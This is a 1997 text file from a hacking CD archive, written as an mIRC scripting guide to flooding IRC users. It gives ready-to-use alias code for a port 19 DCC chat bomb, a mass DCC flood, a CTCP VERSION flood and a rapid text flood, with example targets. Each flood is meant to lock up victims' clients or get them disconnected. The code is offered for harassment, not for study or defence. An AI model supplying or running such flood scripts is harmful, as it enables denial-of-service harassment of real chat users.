home *** CD-ROM | disk | FTP | other *** search
/ SuperHack / SuperHack CD.bin / SCRIPTZ / REACTOR.ZIP / ReAcToR / flooding.txt < prev    next >
Text File  |  1997-01-28  |  3KB  |  72 lines

  1. Flooding
  2.  
  3. Flooding may be fun but will probably get you /ignore'd,/kick'd, and/or /ban'd, possibly /kill'd or /klined'd if you are
  4. enough of a nuisance. Use these floods at your own risk.
  5.  
  6.  
  7.  
  8.                                     Port 19 DCC Chat Bomb
  9.  
  10. How it works:
  11. You send a message to the server to connect with the victim on port 19, the character generator port. If they accept the chat
  12. they get a nice flood in there chat window sometimes locking up mIRC.
  13. How do I do it?
  14. You will need to find a servers longip, see The Scripters Corner, Although you can make a pop-up, I would suggest making an
  15. Alias:
  16.  
  17. portbomb {
  18.   raw -q PRIVMSG $$1 : $+ $chr(1) $+ DCC CHAT CHAT $$2 19 haha $+ $chr(1)
  19. }
  20.  
  21. Usage:
  22. /portbomb {nick/channel} {servers long ip}
  23. /portbomb TiAMaT 3353362454
  24. /portbomb #mIRCScripts 4593668594
  25.  
  26.                                         Mass Dcc Flood
  27.  
  28. The goal here is to fill up the victims screen with enough Dcc's that they'll be busy closing them for awhile or have to
  29. disconnect. Here's an Alias:
  30.  
  31. dccbomb {
  32.    .timer 20 2 /.timer 3 1 /chatsend $$1
  33. }
  34. chatsend {
  35.    raw -q PRIVMSG $$1 : $+ $chr(1) $+ DCC SEND blah $+ $r(1,9) $+ $r(1,9) 3353362454 19 $r(1,9) $+ $r(1,9) $+ $chr(1)
  36.    raw -q PRIVMSG $$1 : $+ $chr(1) $+ DCC CHAT CHAT 3353362454 19 lamer $+ $chr(1)
  37. }
  38.  
  39. Usage:
  40. /dccbomb {nick/channel}
  41. /dccbomb bOnEz
  42. If you don't get disconnected by the server for this whoever you sent it to will have a screen full of chat's and sends.
  43.  
  44.                                           Ctcp Floods
  45.  
  46. The only way to make Ctcp floods work is to make whoever you're flooding send enough through the server to get
  47. disconnected. I like using version because you send 7 characters to the server and they send back alot more depending on
  48. there client. If you want to version flood here's an Alias:
  49.  
  50. verflood {
  51.   ignore -u60 $$1 3
  52.   .timer 5 1 /.timer 10 1 /raw -q privmsg $$1 : $+ $chr(1) $+ VERSION
  53. }
  54.  
  55. Usage:
  56. /verflood {nick/channel}
  57. /verflood _MiZeR_
  58. Note: If you /verflood a channel you'll need to /ignore -u30 *!*@* so you don't get flooded with a whole bunch of version
  59. replys. 
  60.  
  61.                                          Text Flooding
  62.  
  63. Although this really isn't a very effective way of killing people it can be fun if you find an opless channel and wanna scroll the
  64. channel window.
  65. One good flood in playing a wav file at 1 line per millisecond. This can be acoomplished using the /play command and a wav,
  66. exe, or anyfile filled with machine code.
  67.  
  68. playflood {
  69.    play $$1 c:\wavs\smallwav.wav 1
  70. }
  71.  
  72. The one at the end makes it play at 1 line every millisecond, Be careful not to use to big of a file or you'll get disconnected.lt settings.